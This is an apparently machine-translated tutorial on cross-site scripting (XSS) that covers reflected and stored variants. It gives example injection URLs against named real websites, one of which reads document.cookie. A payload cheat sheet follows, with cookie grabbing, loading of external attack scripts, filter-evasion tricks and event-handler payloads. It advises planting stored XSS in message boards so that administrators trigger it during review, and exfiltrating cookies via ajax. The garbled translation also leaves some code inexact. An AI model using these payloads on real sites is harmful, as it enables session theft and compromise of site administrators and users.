Many people in the ss do not pay attention to it. They always think it is a chicken fault. How many people actually know xss?
Xss is divided into storage and reflective
The so-called reflected type often appears in the url search box
Http://www.kuaikuai.cn/search? Q = % 3 Cscript % 3E % 20 alert % 28% 27% E5 % BA % 97% E5 % B0 % 8F % E4 % B8 % 89% 27% 29% 3B % 3C % 2 Fscript % 3E
Http://www.bkjia.com/third. cgi? W = % 3 Cscript % 3E + alert % 28% 2f70838550% 2F % 29% 3B % 3C % 2 Fscript % 3E & y = 5 & k = & netid = & v = % D7 % DB % BA % CF
Http://search.inhe.net/inhesearch/search.jsp? Channelid = 75029 & searchword = % 3 Cscript % 3E + alert % 28document. cookie % 29% 3B % 3C % 2 Fscript % 3E & x = 51 & y = 6
These are so-called reflective. What can xss do? How can I steal cookies? Ajax asynchronous transmission. Anyone who has studied website development knows what ajax is. A reflective xss when you can call external js, you only need to call the code transmitted by the ajax code written outside, and send the obtained cookie to the specified file. What can I do with cookies?
Stored xss
I have seen the most external storage-type xss, that is, message books, intra-site messages of some dating forums, etc. In these places, reflective xss will not be triggered by others, the stored xss is stored in the database, and it does not need to execute attack code on its own and is automatically executed.
Used in javascript
The escape () function can be encoded.
Unescape () encoded strings are decoded.
Run the following command in the evel function:
Script Encoder encryption is developed by Microsoft.
Obfuscated encryption with empty strings and garbled characters
Add spam code in the tab space script using the annotator // without affecting normal execution of the script
<Script> alert ('shop-level employee ') </script> common xss code
<Script> alert (document. cookie); </script> get cookie
img URL XSS
<Script src = "http://www.bkjia.com/blog/ls. js"> <script> external call attack code ls. js
<SCRIPT> alert/* comment out the */('xsss') </SCRIPT> comment method to prevent Filtering
image loading failed execution
<Iframe onload = alert ('shop-level shops')> framework
<Script> location = '2014. com '; </script> jump to a page
Body {background-image: url (javascript: alert ("xss")} added to the css style
<A href = "javascript: alert ('xss')"> store </a> a-linked XSS
<Div style = "background-color: red" onmouseenter = "alert ('shop tips ')"> xss </div>
This is what I often use xss. Of course there are others. These are just the most commonly used ones. For specific analysis of specific situations, I believe that I can understand the code. If you want to play xss, I suggest you take a look at the html/javascript trigger events and tags.
No matter what you do, do not think that xss is a weakness. Many websites use sessions. I can see that many websites use cookies only for sessions in the background. When doing high concurrency, if no one requires session, the front-end uses cookies.
Here is an example. you have to penetrate a website, but you do not know the administrator or who the website belongs to. When you have no way to test the message function, xss is displayed, many website programs with the message function must be managed for review. Management Review will certainly be triggered.
Not much is said for filtering. There is no way to filter out the symbols. Therefore, if you want to perform multiple tests on xss, you can perform local debugging.
A senior penetration testing member. The debugging capability must be strong and self-built, so that you don't need to rely on others.